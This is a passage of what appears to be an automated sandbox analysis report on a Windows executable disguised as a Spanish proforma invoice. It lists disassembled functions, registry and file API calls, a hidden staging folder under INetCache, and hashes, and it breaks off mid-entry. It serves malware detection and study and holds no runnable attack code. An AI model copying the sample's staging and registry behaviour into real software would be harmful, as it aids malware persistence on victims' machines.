                                                  • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                  • Instruction Fuzzy Hash: 4FF0FC31501219A6CF10BB68DD0DF9B375C9B00304F10847EA546F10E0EB78D768C798
                                                  Function 00402ECE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 991 402ece-402ef7 call 4063ae 993 402efc-402f00 991->993 994 402fb1-402fb5 993->994 995 402f06-402f0a 993->995 996 402f0c-402f2d RegEnumValueW 995->996 997 402f2f-402f42 995->997 996->997 998 402f96-402fa4 RegCloseKey 996->998 999 402f6b-402f72 RegEnumKeyW 997->999 998->994 1000 402f44-402f46 999->1000 1001 402f74-402f86 RegCloseKey call 406935 999->1001 1000->998 1002 402f48-402f5c call 402ece 1000->1002 1006 402fa6-402fac 1001->1006 1007 402f88-402f94 RegDeleteKeyW 1001->1007 1002->1001 1009 402f5e-402f6a 1002->1009 1006->994 1007->994 1009->999
                                                  APIs
                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: CloseEnum$DeleteValue
                                                  • String ID:
                                                  • API String ID: 1354259210-0
                                                  • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                  • Instruction ID: d442e96e729bea3163a88d870f4d25619929b9fa7009ff0cba57fd90435ded5e
                                                  • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                  • Instruction Fuzzy Hash: 8B212A7150010ABFDF129F94CE89EEF7A7DEB54388F110076B909B21A0D7B58E54AA68
                                                  Function 707E1817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1010 707e1817-707e1856 call 707e1bff 1014 707e185c-707e1860 1010->1014 1015 707e1976-707e1978 1010->1015 1016 707e1869-707e1876 call 707e2480 1014->1016 1017 707e1862-707e1868 call 707e243e 1014->1017 1022 707e1878-707e187d 1016->1022 1023 707e18a6-707e18ad 1016->1023 1017->1016 1026 707e187f-707e1880 1022->1026 1027 707e1898-707e189b 1022->1027 1024 707e18af-707e18cb call 707e2655 call 707e1654 call 707e1312 GlobalFree 1023->1024 1025 707e18cd-707e18d1 1023->1025 1050 707e1925-707e1929 1024->1050 1028 707e191e-707e1924 call 707e2655 1025->1028 1029 707e18d3-707e191c call 707e1666 call 707e2655 1025->1029 1032 707e1888-707e1889 call 707e2b98 1026->1032 1033 707e1882-707e1883 1026->1033 1027->1023 1030 707e189d-707e189e call 707e2e23 1027->1030 1028->1050 1029->1050 1044 707e18a3 1030->1044 1041 707e188e 1032->1041 1039 707e1885-707e1886 1033->1039 1040 707e1890-707e1896 call 707e2810 1033->1040 1039->1023 1039->1032 1049 707e18a5 1040->1049 1041->1044 1044->1049 1049->1023 1054 707e192b-707e1939 call 707e2618 1050->1054 1055 707e1966-707e196d 1050->1055 1060 707e193b-707e193e 1054->1060 1061 707e1951-707e1958 1054->1061 1055->1015 1057 707e196f-707e1970 GlobalFree 1055->1057 1057->1015 1060->1061 1062 707e1940-707e1948 1060->1062 1061->1055 1063 707e195a-707e1965 call 707e15dd 1061->1063 1062->1061 1064 707e194a-707e194b FreeLibrary 1062->1064 1063->1055 1064->1061
                                                  APIs
                                                    • Part of subcall function 707E1BFF: GlobalFree.KERNEL32(?), ref: 707E1E74
                                                    • Part of subcall function 707E1BFF: GlobalFree.KERNEL32(?), ref: 707E1E79
                                                    • Part of subcall function 707E1BFF: GlobalFree.KERNEL32(?), ref: 707E1E7E
                                                  • GlobalFree.KERNEL32(00000000), ref: 707E18C5
                                                  • FreeLibrary.KERNEL32(?), ref: 707E194B
                                                  • GlobalFree.KERNEL32(00000000), ref: 707E1970
                                                    • Part of subcall function 707E243E: GlobalAlloc.KERNEL32(00000040,?), ref: 707E246F
                                                    • Part of subcall function 707E2810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,707E1896,00000000), ref: 707E28E0
                                                    • Part of subcall function 707E1666: wsprintfW.USER32 ref: 707E1694
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84226363291.00000000707E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 707E0000, based on PE: true
                                                  • Associated: 00000000.00000002.84226292605.00000000707E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.84226422708.00000000707E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.84226496862.00000000707E6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_707e0000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc$Librarywsprintf
                                                  • String ID:
                                                  • API String ID: 3962662361-3916222277
                                                  • Opcode ID: d0be4144c9db670f1a085a2964b7078a74126f0639403d04202610a4c1ac9ecf
                                                  • Instruction ID: d8c4796897c45502fa7531ed802986bc506559f96ae831b1f9d335993d0abfb4
                                                  • Opcode Fuzzy Hash: d0be4144c9db670f1a085a2964b7078a74126f0639403d04202610a4c1ac9ecf
                                                  • Instruction Fuzzy Hash: 6641F272502245DFCB009F36DDCAB8D37BCAF04324F1444E9F90A9B286DBB4A885C760
                                                  Function 004024AF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1067 4024af-4024d6 call 402dcb * 2 call 402e5b 1073 4024db-4024e0 1067->1073 1074 4024e6-4024f0 1073->1074 1075 402c4f-402c5e 1073->1075 1076 4024f2-4024ff call 402dcb lstrlenW 1074->1076 1077 402503-402506 1074->1077 1076->1077 1081 402508-402519 call 402da9 1077->1081 1082 40251a-40251d 1077->1082 1081->1082 1083 40252e-402542 RegSetValueExW 1082->1083 1084 40251f-402529 call 4032d9 1082->1084 1088 402544 1083->1088 1089 402547-402628 RegCloseKey 1083->1089 1084->1083 1088->1089 1089->1075
                                                  APIs
                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,00000023,00000011,00000002), ref: 004024FA
                                                  • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,00000000,00000011,00000002), ref: 0040253A
                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,00000000,00000011,00000002), ref: 00402622
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: CloseValuelstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp
                                                  • API String ID: 2655323295-3152796830
                                                  • Opcode ID: 37a11c6b0f51b22a2f33a6809eb4fcf72931e05cd9d281b1516a83ef08499fb1
                                                  • Instruction ID: 8b3a83999d63c16b18a9973427bcf430ab7992b94c8fe07ed2dd95b358db5eaa
                                                  • Opcode Fuzzy Hash: 37a11c6b0f51b22a2f33a6809eb4fcf72931e05cd9d281b1516a83ef08499fb1
                                                  • Instruction Fuzzy Hash: 1611B431D00114BEDB00AFA5DE59AAEB6B4EF44318F20443FF400B61D1C7B88E409668
                                                  Function 00406060 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 0040607E
                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040351A,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806), ref: 00406099
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                  • API String ID: 1716503409-944333549
                                                  • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                  • Instruction ID: 6ac4114a0c6328616d68196ae331b9967fc339ed7b26ce04d623ba2336a1d7a6
                                                  • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                  • Instruction Fuzzy Hash: D4F09076B40204BBEB00CF69ED05F9FB7ACEB95750F11803AFA01F7180E6B099548768
                                                  Function 004015E6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00405EBB: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,?,00405F2F,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,77943420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,77943420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"), ref: 00405EC9
                                                    • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405ECE
                                                    • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405EE6
                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040163F
                                                    • Part of subcall function 00405A95: CreateDirectoryW.KERNELBASE(0042C800,?), ref: 00405AD7
                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet,?,00000000,000000F0), ref: 00401672
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet, xrefs: 00401665
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                  • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet
                                                  • API String ID: 1892508949-719092821
                                                  • Opcode ID: 1cb6e0f2a5ab0800d51524057d62bd681975080efc3acd993a5567cdeed0022e
                                                  • Instruction ID: 707209c2395922376f9f001c82b8f9212c950a3f0646f554414056ec45e3a30b
                                                  • Opcode Fuzzy Hash: 1cb6e0f2a5ab0800d51524057d62bd681975080efc3acd993a5567cdeed0022e
                                                  • Instruction Fuzzy Hash: DC11B231504514EBDF206FA5CD415AF36B0EF14368B25493FE942B22F1D63E4A81DA9D
                                                  Function 0040640F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,Call,?,00000000,00406680,80000002), ref: 00406455
                                                  • RegCloseKey.ADVAPI32(?), ref: 00406460
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue
                                                  • String ID: Call
                                                  • API String ID: 3356406503-1824292864
                                                  • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                  • Instruction ID: ab0cc6cc405738cc07c99bf25685dc2411b0540f073fb059e05756a610da7e73
                                                  • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                  • Instruction Fuzzy Hash: 4F015E72510209AADF218F51CC05EDB3BA8EB54354F01403AFD5992150D738D968DB94
                                                  Function 00407094 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2ff22e2e2fe9ce3de78e7ddd3335664d820a6fec416f6b591a6c72a947d9530d
                                                  • Instruction ID: 57bf2fd90c69a3a2134d3ca1d9604f9a54cf20ddad3feead76618616929b2f58
                                                  • Opcode Fuzzy Hash: 2ff22e2e2fe9ce3de78e7ddd3335664d820a6fec416f6b591a6c72a947d9530d
                                                  • Instruction Fuzzy Hash: 17A15471E04229CBDF28CFA8C8546ADBBB1FF44305F10846ED816BB281D7786A86DF45
                                                  Function 00407295 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0bdb7e84a84856003d11171116f50dfbd9bb9a779b2e7a3e4899fdc47cedc848
                                                  • Instruction ID: 6b1c66eb9f97b1ade68f1d395623a9ed29f1776dbc94043a645b3c6b65beda35
                                                  • Opcode Fuzzy Hash: 0bdb7e84a84856003d11171116f50dfbd9bb9a779b2e7a3e4899fdc47cedc848
                                                  • Instruction Fuzzy Hash: C5912270E04228CBDF28CF98C854BADBBB1FF44305F14816AD856BB281D778A986DF45
                                                  Function 00406FAB Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: be7a598e94a0405de8a772e3f69c54869daecda94b4303a07673bf76e2652f1c
                                                  • Instruction ID: ce41943af36f178b06a8ef9aeec7331a28cc36c4f565c07526a7a1ecbc0683f6
                                                  • Opcode Fuzzy Hash: be7a598e94a0405de8a772e3f69c54869daecda94b4303a07673bf76e2652f1c
                                                  • Instruction Fuzzy Hash: 8C813571E04228CFDF24CFA8C844BADBBB1FB45305F24816AD456BB281D778A986DF45
                                                  Function 00406AB0 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 32d59b201beac9d8f322f7ad5055b4a277c8e7969ed8db35c8d1fbf5724c7b18
                                                  • Instruction ID: 8f4657df29e0a6c4f41eae1c6e560b42ebe12933d6c33c39fa024371cffe791d
                                                  • Opcode Fuzzy Hash: 32d59b201beac9d8f322f7ad5055b4a277c8e7969ed8db35c8d1fbf5724c7b18
                                                  • Instruction Fuzzy Hash: F4815771E04228DBDF24CFA8C8447ADBBB1FF44315F10816AD856BB281D7786986DF45
                                                  Function 00406EFE Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5ad3ccd1842de9fa96a72a1c56b2a37abd66cddd4bfb2a4aa43cc43f3deb674d
                                                  • Instruction ID: 467485e0bb60f7ca81b57cb4e762169b1f98b62e9d0b722d18e83a7fcf81438f
                                                  • Opcode Fuzzy Hash: 5ad3ccd1842de9fa96a72a1c56b2a37abd66cddd4bfb2a4aa43cc43f3deb674d
                                                  • Instruction Fuzzy Hash: 04711375E04228CBDF24CFA8C844BADBBF1FB48305F15806AD856B7281D778A986DF45
                                                  Function 0040701C Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
